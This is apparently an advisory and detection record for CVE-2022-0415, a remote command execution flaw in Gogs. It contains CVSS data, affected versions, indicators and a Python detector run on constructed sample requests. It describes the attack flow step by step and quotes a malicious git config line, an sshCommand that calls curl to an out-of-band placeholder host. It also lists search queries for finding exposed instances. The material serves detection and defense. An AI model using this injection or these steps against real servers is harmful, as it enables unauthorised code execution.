CVE-2022-0415
published 2022-03-21

CVE-2022-0415: Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.

Priority: P2 / 75 / high
CVSS 3.1: 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: flagged
EPSS: 65.24% (99.2th percentile)

Affected (3 ranges)

Vendor   | Product   | Version range            | Fixed in
gogs.io  | gogs      | >= 0, < 0.12.6           | 0.12.6
gogs     | gogs      | < 0.12.6                 | 0.12.6
gogs     | gogs_gogs | >= unspecified, < 0.12.6 | 0.12.6

Detection & IOCs (extracted from sources)

url: /<username>/<repo>/upload-file
url: /<username>/<repo>/_upload/master/
filename: config
command: sshCommand = curl http://{{interactsh-url}} -I
path: /.git/
other: X-Csrf-Token header present in upload-file multipart POST
  • Exploit uploads a malicious git 'config' file via the repository file upload endpoint (upload-file), injecting an sshCommand directive for RCE. Look for multipart POST requests to /<user>/<repo>/upload-file with a filename of 'config' and a body containing 'sshCommand'.
  • After uploading the malicious config, the attacker commits it to /.git/ via POST to /_upload/master/ with tree_path=/.git/. Monitor for commit operations targeting the .git directory path.
  • Exploitation requires authentication (PR:L). The attack flow is: login → create repo → upload malicious git config → commit to .git path. Authenticated sessions with repo-creation activity followed by upload-file and _upload/master/ requests are suspicious.
  • Shodan/FOFA fingerprinting queries for exposed Gogs instances: search for http.title 'sign in - gogs' or CPE cpe:2.3:a:gogs:gogs to identify attack surface.
  • Vulnerable versions are Gogs prior to 0.12.6. Detect via the page body containing 'content="Gogs' to confirm the target is a Gogs instance.
  • Out-of-band callback (DNS/HTTP) via interactsh confirms RCE. Monitor for unexpected outbound curl/HTTP requests originating from the Gogs server process after a file upload event.
  • Exploitation requires a valid authenticated user account on the Gogs instance (CVSS PR:L). Anonymous exploitation is not possible.
  • The vulnerability is fixed in Gogs 0.12.6. Instances running 0.12.6 or later are not affected.
  • The attack abuses the git config sshCommand injection (CWE-434/CWE-20): the malicious config file must be successfully committed to the .git/ directory path for RCE to trigger.
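Detection logic for the two-stage flow described in the bullets above, as an added example that is not part of the source record or the Gogs project: it classifies constructed request records (assumed to come from a reverse proxy or WAF log in front of Gogs, with method, path, form fields, uploaded filenames and body already parsed) and correlates the upload-file and _upload/master/ stages per session.

```python
import re
from typing import Dict, List

# Endpoint shapes taken from the IOC list: /<user>/<repo>/upload-file and
# /<user>/<repo>/_upload/<branch>/ (the record shows master).
UPLOAD_FILE = re.compile(r"^/[^/]+/[^/]+/upload-file$")
COMMIT_PATH = re.compile(r"^/[^/]+/[^/]+/_upload/[^/]+/$")


def classify_request(req: Dict) -> List[str]:
    """Return the CVE-2022-0415 indicators matched by a single request record."""
    hits: List[str] = []
    if req.get("method") != "POST":
        return hits
    path = req.get("path", "")
    if UPLOAD_FILE.match(path):
        # Stage 1: a git 'config' file pushed through the repository upload endpoint.
        if "config" in req.get("filenames", []):
            hits.append("upload-file:filename=config")
        if "sshCommand" in req.get("body", ""):
            hits.append("upload-file:body-has-sshCommand")
    elif COMMIT_PATH.match(path):
        # Stage 2: the uploaded file is committed into the .git directory itself.
        if req.get("form", {}).get("tree_path", "").strip("/") == ".git":
            hits.append("_upload:tree_path=/.git/")
    return hits


def correlate(requests: List[Dict]) -> Dict[str, List[str]]:
    """Group indicators per session and keep only sessions showing both stages."""
    by_session: Dict[str, List[str]] = {}
    for req in requests:
        for hit in classify_request(req):
            by_session.setdefault(req["session"], []).append(hit)
    return {s: h for s, h in by_session.items()
            if any(x.startswith("upload-file") for x in h)
            and any(x.startswith("_upload") for x in h)}


# Constructed sample records (not real traffic); the sshCommand value is the one
# quoted in the IOC list above.
SAMPLE_REQUESTS = [
    {"session": "s1", "method": "POST", "path": "/alice/demo/upload-file",
     "filenames": ["config"], "form": {},
     "body": "[core]\n\tsshCommand = curl http://{{interactsh-url}} -I\n"},
    {"session": "s1", "method": "POST", "path": "/alice/demo/_upload/master/",
     "filenames": [], "form": {"tree_path": "/.git/", "commit_summary": "add"}, "body": ""},
    {"session": "s2", "method": "POST", "path": "/bob/site/upload-file",
     "filenames": ["README.md"], "form": {}, "body": "# hello"},
    {"session": "s3", "method": "POST", "path": "/carol/app/_upload/master/",
     "filenames": [], "form": {"tree_path": "/docs/"}, "body": ""},
]
```

Running `correlate(SAMPLE_REQUESTS)` flags only session s1, which has both the config upload and the commit into /.git/; a lone README upload or a commit to a normal path is not reported.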

CVSS provenance

Source | Version | Score | Severity | Vector
nvd    | v3.1    | 8.8   | HIGH     | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd    | v3.0    | 9.9   | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvd    | v2.0    | 6.5   | MEDIUM   | AV:N/AC:L/Au:S/C:P/I:P/A:P
osv    |         | 8.8   | HIGH     |